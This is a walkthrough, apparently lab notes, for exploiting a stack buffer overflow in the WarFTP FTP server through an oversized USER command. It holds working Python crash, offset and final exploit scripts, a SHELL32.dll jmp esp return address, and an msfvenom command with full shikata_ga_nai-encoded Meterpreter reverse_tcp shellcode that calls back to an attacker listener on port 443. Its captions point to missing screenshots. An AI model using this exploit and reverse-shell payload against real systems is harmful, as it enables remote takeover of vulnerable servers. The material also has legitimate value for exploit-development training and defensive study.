Material

Steps

Send an oversized USER argument to crash the service (on the Windows target this shows up as an access violation rather than a segmentation fault); attach a debugger to WarFTP first and confirm that EIP reads 0x41414141 before moving on:

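#!/usr/bin/python
import socket

TARGET = ('192.168.119.155', 21)


def build_crash_payload(length=1000):
    """Return *length* bytes of 0x41 ('A'), the classic EIP-overwrite marker."""
    return b"\x41" * length


def build_user_cmd(payload):
    """Return the raw FTP USER line carrying *payload* (bytes), CRLF-terminated."""
    return b'USER ' + payload + b'\r\n'


def send_crash(target=TARGET, length=1000, timeout=10):
    """Send an oversized USER argument to *target* to provoke the crash.

    Bytes literals are used throughout so the script behaves the same under
    Python 2 and 3 (under Python 3 send() rejects a str payload). sendall()
    replaces send() so a partial write cannot truncate the overflow, a
    timeout stops the script hanging if the crashed service never answers,
    and the socket is closed on every path.
    """
    buffer = build_crash_payload(length)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect(target)
        s.recv(1024)  # greeting banner
        print("Sending data to WarFTP...")
        s.sendall(build_user_cmd(buffer))
        s.recv(1024)
        s.sendall(b' PASS PASSWORD ' + b'\r\n')
    except socket.error as e:
        # A reset or timeout here is the expected sign that the service died.
        print("Connection ended early: %s" % e)
    finally:
        s.close()
    print("Finish")


if __name__ == "__main__":
    send_crash()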

The result from victim:

Send a unique cyclic pattern instead of the 'A's, so the value that lands in EIP identifies the exact offset of the overwrite:

# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700 > /tmp/pattern
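#!/usr/bin/python
import socket

TARGET = ('192.168.119.155', 21)
# Written by: pattern_create.rb -l 2700 > /tmp/pattern
PATTERN_FILE = '/tmp/pattern'


def build_user_cmd(payload):
    """Return the raw FTP USER line carrying *payload* (bytes), CRLF-terminated."""
    return b'USER ' + payload + b'\r\n'


def load_pattern(path=PATTERN_FILE):
    """Read the cyclic pattern as bytes, dropping any trailing newline.

    The generated file usually ends in a newline; sending it would put a
    bare LF inside the USER line ahead of the real CRLF terminator.
    """
    with open(path, 'rb') as fh:
        return fh.read().rstrip(b'\r\n')


def send_pattern(target=TARGET, path=PATTERN_FILE, timeout=10):
    """Send the cyclic pattern as the USER argument so EIP reveals the offset.

    Bytes are used throughout so the script behaves the same under Python 2
    and 3; sendall() guarantees the whole pattern goes out (send() may write
    only part of a 2700-byte buffer); a timeout stops the script hanging if
    the crashed service never answers; the socket is closed on every path.
    """
    buffer = load_pattern(path)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect(target)
        s.recv(1024)  # greeting banner
        print("Sending data to WarFTP...")
        s.sendall(build_user_cmd(buffer))
        s.recv(1024)
        s.sendall(b' PASS PASSWORD ' + b'\r\n')
    except socket.error as e:
        # A reset or timeout here is the expected sign that the service died.
        print("Connection ended early: %s" % e)
    finally:
        s.close()
    print("Finish")


if __name__ == "__main__":
    send_pattern()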

The result from victim:

Look up the value found in EIP with pattern_offset.rb to get the exact offset (485 here, which becomes the padding length in the final exploit):

# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 32714131

Find a `jmp esp` gadget, e.g. in SHELL32.dll (prefer a module that is not rebased or ASLR-protected on the target, and make sure the address contains none of the bad characters):

The gadget is at 0x7c9e30d7, written into the buffer little-endian as \xd7\x30\x9e\x7c. The address is tied to the exact SHELL32.dll build loaded on the victim, so re-check it against any other target.

Generate the shellcode with the bad characters excluded (\x00\x0a\x0d\x40\xcc here — at minimum the null byte and the CR/LF that terminate the FTP command line), using the shikata_ga_nai encoder:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.158 LPORT=443 -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x40\xcc" > shellcode
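#!/usr/bin/python
import socket

TARGET = ('192.168.119.155', 21)

# Padding length to reach EIP (from pattern_offset.rb), the jmp esp gadget
# in SHELL32.dll written little-endian, and the NOP sled length.
OFFSET = 485
RET = b'\xd7\x30\x9e\x7c'
NOP_SLED = 12
# Characters excluded when the shellcode was generated; everything after the
# padding (return address, sled, shellcode) must stay free of them.
BAD_CHARS = b"\x00\x0a\x0d\x40\xcc"

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.158 LPORT=443
#   -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x40\xcc"
# A matching multi/handler must be listening on LHOST:443 before running this.
buf = b""
buf += b"\xbb\xd1\x9d\x2c\x04\xdb\xd1\xd9\x74\x24\xf4\x58\x33"
buf += b"\xc9\xb1\x54\x31\x58\x13\x83\xc0\x04\x03\x58\xde\x7f"
buf += b"\xd9\xf8\x08\xfd\x22\x01\xc8\x62\xaa\xe4\xf9\xa2\xc8"
buf += b"\x6d\xa9\x12\x9a\x20\x45\xd8\xce\xd0\xde\xac\xc6\xd7"
buf += b"\x57\x1a\x31\xd9\x68\x37\x01\x78\xea\x4a\x56\x5a\xd3"
buf += b"\x84\xab\x9b\x14\xf8\x46\xc9\xcd\x76\xf4\xfe\x7a\xc2"
buf += b"\xc5\x75\x30\xc2\x4d\x69\x80\xe5\x7c\x3c\x9b\xbf\x5e"
buf += b"\xbe\x48\xb4\xd6\xd8\x8d\xf1\xa1\x53\x65\x8d\x33\xb2"
buf += b"\xb4\x6e\x9f\xfb\x79\x9d\xe1\x3c\xbd\x7e\x94\x34\xbe"
buf += b"\x03\xaf\x82\xbd\xdf\x3a\x11\x65\xab\x9d\xfd\x94\x78"
buf += b"\x7b\x75\x9a\x35\x0f\xd1\xbe\xc8\xdc\x69\xba\x41\xe3"
buf += b"\xbd\x4b\x11\xc0\x19\x10\xc1\x69\x3b\xfc\xa4\x96\x5b"
buf += b"\x5f\x18\x33\x17\x4d\x4d\x4e\x7a\x19\xa2\x63\x85\xd9"
buf += b"\xac\xf4\xf6\xeb\x73\xaf\x90\x47\xfb\x69\x66\xa8\xd6"
buf += b"\xce\xf8\x57\xd9\x2e\xd0\x93\x8d\x7e\x4a\x32\xae\x14"
buf += b"\x8a\xbb\x7b\x80\x80\x2b\x44\xfd\xe2\x35\x2c\xfc\x0c"
buf += b"\x48\x16\x89\xeb\x1a\x38\xda\xa3\xda\xe8\x9a\x13\xb2"
buf += b"\xe2\x14\x4b\xa2\x0c\xff\xe4\x48\xe3\x56\x5c\xe4\x9a"
buf += b"\xf2\x16\x95\x63\x29\x53\x95\xe8\xd8\xa3\x5b\x19\xa8"
buf += b"\xb7\x8b\x78\x52\x48\x4b\x11\x52\x22\x4f\xb3\x05\xda"
buf += b"\x4d\xe2\x62\x45\xae\xc1\xf0\x82\x50\x94\xc0\xf9\x66"
buf += b"\x02\x6d\x96\x86\xc2\x6d\x66\xd0\x88\x6d\x0e\x84\xe8"
buf += b"\x3d\x2b\xcb\x24\x52\xe0\x59\xc7\x03\x54\xca\xaf\xa9"
buf += b"\x83\x3c\x70\x51\xe6\x3f\x77\xad\x74\x1d\xd0\xc6\x86"
buf += b"\x21\xe0\x16\xed\xa1\xb0\x7e\xfa\x8e\x3f\x4f\x03\x05"
buf += b"\x68\xc7\x8e\xcb\xda\x76\x8e\xc6\xbb\x26\x8f\xe4\x67"
buf += b"\x3e\x1e\x0b\x98\x3f\xe0\x30\x4e\x06\x96\x71\x52\x3d"
buf += b"\xa9\xc8\xf7\x14\x20\x32\xab\x67\x61"
SHELLCODE = buf


def find_bad_chars(data, bad_chars=BAD_CHARS):
    """Return the members of *bad_chars* that occur in *data*, in *bad_chars* order.

    bytearray is used so the byte-wise iteration is identical on Python 2
    (where iterating bytes yields 1-char strings) and Python 3 (ints).
    """
    present = bytearray(data)
    return bytes(bytearray(c for c in bytearray(bad_chars) if c in present))


def build_exploit(shellcode=SHELLCODE, offset=OFFSET, ret=RET, nops=NOP_SLED,
                  bad_chars=BAD_CHARS):
    """Assemble padding + return address + NOP sled + shellcode as bytes.

    Raises ValueError if the return address, the sled or the shellcode
    contains one of *bad_chars*: those bytes were excluded from the encoder
    for a reason, and a stray one would quietly break the exploit.
    """
    tail = ret + b'\x90' * nops + shellcode
    found = find_bad_chars(tail, bad_chars)
    if found:
        raise ValueError("payload contains bad characters: %r" % found)
    return b'A' * offset + tail


def build_user_cmd(payload):
    """Return the raw FTP USER line carrying *payload* (bytes), CRLF-terminated."""
    return b'USER ' + payload + b'\r\n'


def send_exploit(target=TARGET, timeout=10):
    """Deliver the exploit buffer as the USER argument to *target*.

    Bytes are used throughout so the script behaves the same under Python 2
    and 3; sendall() guarantees the full buffer is written. Once the
    shellcode runs, the server thread is hijacked and may never answer the
    second recv(), so a timeout keeps the script from hanging forever and
    the socket is closed on every path.
    """
    buffer = build_exploit()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect(target)
        s.recv(1024)  # greeting banner
        print("Sending data to WarFTP...")
        s.sendall(build_user_cmd(buffer))
        s.recv(1024)
        s.sendall(b' PASS PASSWORD ' + b'\r\n')
    except socket.error as e:
        # Expected once the shellcode has taken over the connection thread.
        print("Connection ended early: %s" % e)
    finally:
        s.close()
    print("Finish")


if __name__ == "__main__":
    send_exploit()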

P: How do you work out the exact size of the NOP sled in front of the shellcode?
S: The sled is not just a landing zone, it is scratch space for the decoder. The x86/shikata_ga_nai stub finds its own address with `fnstenv [esp-0xc]` (the `\xd9\x74\x24\xf4` bytes near the start of `buf`), which stores a 28-byte FPU environment from ESP-12 up to ESP+15. If `jmp esp` lands directly on the stub, that store overwrites the stub's own not-yet-executed bytes and it crashes; with the 12 NOPs used here, ESP sits 12 bytes ahead of the stub and the store only touches NOPs and the stub's already-executed first instruction. So the practical rule is: at least enough bytes to cover what the decoder writes above ESP (12–16 is the usual choice, and more does no harm if the buffer has room), or put a `sub esp, 0x10`-style stack adjustment before the shellcode and drop the sled. Confirm by single-stepping the first few decoder instructions in the debugger and watching which bytes change.

The Meterpreter session opens on the handler listening on LHOST:443:

References
